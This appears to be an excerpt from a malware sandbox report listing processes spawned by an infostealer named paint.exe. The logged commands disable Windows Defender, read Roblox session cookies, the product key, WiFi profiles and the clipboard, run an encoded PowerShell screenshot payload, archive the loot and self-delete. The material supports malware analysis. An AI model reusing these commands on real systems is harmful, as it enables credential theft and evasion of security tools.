              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe""Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
